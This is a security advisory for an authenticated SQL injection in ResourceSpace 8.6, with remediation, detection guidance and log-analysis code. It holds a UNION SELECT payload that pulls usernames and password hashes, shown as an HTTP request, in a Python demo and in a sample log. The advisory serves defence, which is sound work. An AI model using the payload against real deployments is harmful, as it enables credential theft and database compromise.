Overview
CVE-2019-25693 is a high severity SQL injection vulnerability (CVSS 7.1) affecting ResourceSpace version 8.6, an open-source Digital Asset Management (DAM) system. The vulnerability exists in the collection_edit.php script and allows authenticated users to inject arbitrary SQL code through the keywords POST parameter, potentially exposing all data stored in the backend database.
This vulnerability was published to the National Vulnerability Database (NVD) on April 12, 2026.
Technical Details
Vulnerability Type
- CWE Classification: CWE-89 — Improper Neutralization of Special Elements used in an SQL Command (SQL Injection)
- CVSS Score: 7.1 (High)
- Attack Vector: Network
- Authentication Required: Yes (authenticated attacker)
- Attack Complexity: Low
Affected Endpoint
/pages/collection_edit.php
The keywords parameter in a POST request to this endpoint is passed directly into a SQL query without proper sanitization or parameterization, allowing an attacker to inject SQL code.
Proof of Concept
An authenticated attacker can submit a crafted POST request:
```http
POST /pages/collection_edit.php HTTP/1.1
Host: target-resourcespace.example.com
Content-Type: application/x-www-form-urlencoded
Cookie: [valid session]

keywords=' UNION SELECT username,password,NULL FROM user--&...
```
(The body is shown URL-decoded for readability.) By injecting a UNION SELECT payload into the keywords field, the attacker appends a second query to the one the script builds and reads its rows back in the normal page response. Two practical constraints apply: the injected SELECT must return the same number of columns as the original query (hence the NULL padding), and MySQL only treats -- as a comment when whitespace follows it, so against a MySQL/MariaDB backend the trailing comment is normally written as "-- -" or "#". With those in place the attacker can extract any table in the database, including:
- User credentials (usernames, password hashes)
- File metadata for all managed assets
- Collection data and sharing permissions
- API keys and tokens if stored in the database
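The mechanics above, reduced to a runnable demonstration. This is an added example, not code from the advisory or the ResourceSpace project: an in-memory SQLite database stands in for the MySQL/MariaDB backend, the collection and user tables and their rows are constructed here, and the query shape follows the advisory's own vulnerable snippet (a LIKE pattern built by string concatenation). It shows the UNION payload pulling user rows through the concatenated query, the same idea failing when the column count is wrong, and the parameterized query treating the payload as a literal pattern.

```python
import sqlite3

# Constructed in-memory stand-in for the two tables the advisory mentions.
# The real ResourceSpace schema is not reproduced; only the column counts
# matter for the UNION demonstration (assumption: three columns selected).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE collection (ref INTEGER, name TEXT, keywords TEXT);
        CREATE TABLE user (ref INTEGER, username TEXT, password TEXT);
        INSERT INTO collection VALUES (1, 'Press kit', 'press, logo');
        INSERT INTO collection VALUES (2, 'Archive scans', 'scans, archive');
        INSERT INTO user VALUES (1, 'admin', '$2y$10$constructedhash1');
        INSERT INTO user VALUES (2, 'editor', '$2y$10$constructedhash2');
    """)
    return conn

def search_vulnerable(conn, keywords):
    """Concatenates user input into the query text: the CWE-89 pattern. DO NOT USE."""
    sql = ("SELECT ref, name, keywords FROM collection "
           "WHERE keywords LIKE '%" + keywords + "%'")
    return conn.execute(sql).fetchall()

def search_fixed(conn, keywords):
    """Binds the whole pattern as a parameter; the driver never parses it as SQL."""
    sql = "SELECT ref, name, keywords FROM collection WHERE keywords LIKE ?"
    return conn.execute(sql, ("%" + keywords + "%",)).fetchall()

def run_vulnerable(conn, keywords):
    """Like search_vulnerable, but returns the database error text instead of
    raising, so a malformed injection (wrong UNION column count) is visible."""
    try:
        return search_vulnerable(conn, keywords)
    except sqlite3.OperationalError as exc:
        return str(exc)

# The advisory's payload, with the comment written as '-- -' so it would also
# work against MySQL, which only honours '--' when whitespace follows it.
PAYLOAD = "' UNION SELECT username,password,NULL FROM user-- -"
# Same idea with the wrong number of columns: the query fails instead of dumping data.
BAD_PAYLOAD = "' UNION SELECT username FROM user-- -"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable query, UNION payload:", run_vulnerable(db, PAYLOAD))
    print("vulnerable query, wrong column count:", run_vulnerable(db, BAD_PAYLOAD))
    print("parameterized query, same payload:", search_fixed(db, PAYLOAD))
```

The vulnerable path returns the collection rows followed by the two user rows (username, password hash, NULL); the parameterized path returns nothing, because no keywords value literally contains the payload text.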
Attack Flow
- Attacker authenticates to ResourceSpace with any valid account (including low-privilege users)
- Attacker navigates to a collection and triggers the collection_edit.php endpoint
- A crafted keywords value containing a SQL injection payload is submitted via POST
- The unsanitized input is concatenated into a live SQL query
- Database contents are returned within the application response
Impact Assessment
| Impact Area | Description | Severity |
|---|---|---|
| Data Confidentiality | Full database read access | High |
| Privilege Escalation | Extract admin credentials for full takeover | High |
| Data Integrity | Potential for destructive SQL (DROP, UPDATE) | Medium |
| Availability | Database manipulation could corrupt asset library | Medium |
ResourceSpace is commonly used by media organizations, universities, corporations, and government agencies to manage large libraries of digital assets. A successful SQL injection attack against such a deployment could expose:
- Confidential media files and their metadata
- Internal user directories with hashed passwords
- Business-sensitive asset collections
- Authentication tokens for external integrations
Affected Versions
| Product | Affected Version | Fix Status |
|---|---|---|
| ResourceSpace | 8.6 | Upgrade strongly recommended |
Users of ResourceSpace should verify their currently running version and apply updates. The ResourceSpace project actively releases security patches — check the official repository for the latest stable release.
Remediation
Upgrade
Update ResourceSpace to the latest available version. Versions released after the vulnerability disclosure should include a patch for this specific injection point.
If Immediate Upgrade Is Not Possible
- Restrict access to collection_edit.php to trusted IP ranges using web server configuration.
- Deploy a Web Application Firewall (WAF) with SQL injection rules enabled. ModSecurity with the OWASP Core Rule Set (CRS) will block common SQL injection patterns, but treat it as a stopgap: WAF rules can be bypassed and do not remove the flaw.
- Implement prepared statements if maintaining a custom fork. Replace the vulnerable query with parameterized SQL (note that mysqli's bind_param takes its arguments by reference, so the pattern must be placed in a variable first):

```php
// Vulnerable (DO NOT USE): user input becomes part of the SQL text
$sql = "SELECT * FROM collection WHERE keywords LIKE '%" . $keywords . "%'";

// Fixed: bind the pattern as a parameter so the driver never parses it as SQL
$pattern = "%{$keywords}%";
$stmt = $db->prepare("SELECT * FROM collection WHERE keywords LIKE ?");
$stmt->bind_param("s", $pattern);
$stmt->execute();
```

  Binding stops injection but does not neutralize the LIKE wildcards % and _ inside $keywords; escape those separately if a literal match is intended.
- Audit database user permissions. The ResourceSpace database account should not have privileges beyond SELECT, INSERT, UPDATE, and DELETE on required tables. Revoke DROP, CREATE, and GRANT privileges; schema upgrades that need CREATE or ALTER should run under a separate account or a temporary grant rather than a permanent one.
- Rotate all user passwords in any deployment that may have been exploited. If admin credentials were exposed, assume full system compromise.
Detection
Review web server access logs and application logs for:
- POST requests to collection_edit.php containing SQL metacharacters (', --, UNION, SELECT, 1=1). A default Apache or nginx access log does not record POST bodies, so the parameter values are only visible in a WAF audit log, a reverse proxy configured to log bodies, or the application's own logging; the access log still shows the request path, status and response size.
- Unusually large response payloads from collection edit operations
- Database error messages in application responses (sign of error-based injection attempts)
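A detector for the indicators above, as an added example that is not part of the advisory. It reads constructed JSON-lines records in an assumed log shape that includes the decoded request body (which, as noted, a plain access log lacks), extracts the keywords field, applies a conservative SQL-injection heuristic, flags responses far larger than the median for the endpoint, and treats 5xx responses as a proxy for database errors whose text only the application log would carry verbatim. The field names, sample addresses and timestamps are all constructed.

```python
import json
import re
import statistics
from urllib.parse import parse_qs

# Constructed sample log (assumed JSON-lines shape with the request body included).
# Three benign edits from an internal address, then two suspicious requests.
SAMPLE_LOG = """\
{"ts":"2026-04-13T09:01:02Z","src":"10.0.0.8","method":"POST","path":"/pages/collection_edit.php","status":200,"bytes":4120,"body":"ref=12&keywords=press+kit&save=1"}
{"ts":"2026-04-13T09:02:10Z","src":"10.0.0.8","method":"POST","path":"/pages/collection_edit.php","status":200,"bytes":4098,"body":"ref=12&keywords=logo&save=1"}
{"ts":"2026-04-13T09:03:44Z","src":"10.0.0.8","method":"GET","path":"/pages/collection_edit.php?ref=12","status":200,"bytes":4050,"body":""}
{"ts":"2026-04-13T09:05:31Z","src":"203.0.113.7","method":"POST","path":"/pages/collection_edit.php","status":200,"bytes":91877,"body":"ref=12&keywords=%27+UNION+SELECT+username%2Cpassword%2CNULL+FROM+user--+-&save=1"}
{"ts":"2026-04-13T09:05:40Z","src":"203.0.113.7","method":"POST","path":"/pages/collection_edit.php","status":500,"bytes":612,"body":"ref=12&keywords=%27+AND+1%3D1--+-&save=1"}
"""

def parse_lines(log_text):
    """Yield one dict per non-empty JSON line."""
    for line in log_text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)

def keywords_from_body(body):
    """Return the URL-decoded 'keywords' POST field, or '' when absent."""
    return parse_qs(body).get("keywords", [""])[0]

def looks_like_sqli(value):
    """Heuristic match for the metacharacters the advisory lists. A bare SQL
    keyword or a tautology is enough on its own; a quote or comment token only
    counts when a clause keyword accompanies it, so ordinary values such as
    O'Brien do not produce findings."""
    v = value.lower()
    keyword = re.search(r"\b(union|select|sleep|benchmark|load_file)\b", v)
    tautology = re.search(r"\b(or|and)\b\s*['\d]+\s*=\s*['\d]+", v)
    structural = re.search(r"('|--|#|/\*)", v)
    clause = re.search(r"\b(or|and|from|where|drop|insert|update|delete)\b", v)
    return bool(keyword or tautology or (structural and clause))

def analyze(log_text, endpoint="/pages/collection_edit.php", size_factor=5):
    """Return a list of findings for POSTs to the endpoint, in log order."""
    records = [r for r in parse_lines(log_text)
               if r["method"] == "POST" and r["path"].split("?")[0] == endpoint]
    # Baseline response size from successful edits; an extracted table is far larger.
    sizes = [r["bytes"] for r in records if r["status"] == 200]
    baseline = statistics.median(sizes) if sizes else 0
    findings = []
    for r in records:
        reasons = []
        kw = keywords_from_body(r.get("body", ""))
        if looks_like_sqli(kw):
            reasons.append("sqli-pattern")
        if baseline and r["bytes"] > size_factor * baseline:
            reasons.append("oversized-response")
        if r["status"] >= 500:
            reasons.append("server-error")
        if reasons:
            findings.append({"ts": r["ts"], "src": r["src"],
                             "keywords": kw, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(json.dumps(finding))
```

On the sample log the two requests from 203.0.113.7 are flagged: the UNION request for its payload and its 22x-larger response, the tautology request for its payload and the 500 status. The size baseline is computed per endpoint from the same log, so the script needs no tuning beyond the endpoint path, though the heuristic will still flag an occasional legitimate value that pairs an apostrophe with a word like "delete".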
References
- NVD Entry — CVE-2019-25693
- CVSS v3.1 Score: 7.1 High
- Published: April 12, 2026
- ResourceSpace Official Site
Disclosure Timeline
| Date | Event |
|---|---|
| 2019 (original discovery) | Vulnerability identified in ResourceSpace 8.6 |
| April 12, 2026 | Published to National Vulnerability Database (NVD) |
This advisory is provided for defensive and informational purposes. Organizations running ResourceSpace should treat this as a high-priority patch item given the authenticated SQL injection vector.